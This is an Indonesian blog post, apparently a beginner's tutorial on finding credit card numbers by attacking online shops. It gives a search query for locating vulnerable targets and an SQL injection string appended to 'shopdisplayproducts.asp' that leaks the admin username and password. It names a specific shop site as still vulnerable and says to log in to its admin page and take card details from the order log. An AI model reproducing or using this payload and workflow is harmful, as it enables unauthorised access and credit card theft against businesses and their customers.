Sedikit cara buat nyari CC (Credit Card) di internet
mungkin sudah basi...ini Saya posting buat yang pemula seperti saya..hehehehehe.
Kalau begitu Saya mulai...
Langkah yang pertama ialah mencari target web yang mau kita test vuln apa enggaxnya, kita cari di google dengan keyword :
/shop/shopdisplayproducts.asp atau shopdisplayproducts.asp
Kalau sudah dapat web yang ingin di jadikan target. terus kita coba pakai script ini
?cat=´%20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password
Misalnya kita dapat target
http://www.masih-vuln.com/shopdisplaypr ...
Terus kita masukin script tadi dibelakang shopdisplayproducts.asp jadinya seperti ini :
http://www.masih-vuln.com/shopdisplayproducts.asp?cat´%20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password
Dan apa yang terjadi…? Kok tidak ada yang terjadi malahan keluar The page cannot be found
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
Kalau seperti itu artinya web tersebut tidak bisa kita kasih script seperti diatas, coba cari yang lain. Kalau webnya masih vuln entar keluar username sama password adminnya, kalau sudah dapat kita tinggal login pakai username and password hasil temuan kita tadi. Sebagai contoh web yang masih vuln adalah :
http://www.ilovesport.com.au/
jadinya :
http://www.ilovesport.com.au/shop/shopd ... s.asp?cat=´%20and%201=convert(int(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password
Dan yang keluar malahan username sama password adminnya, habis itu kita tinggal login pakai username dan password tersebut di
http://www.ilovesport.com.au/shop/admin.asp
Setelah itu masuk ke order lognya terus cari akun kartu kreditnya disana.
selamat mencoba...!!
Image000.jpg)
Posting Komentar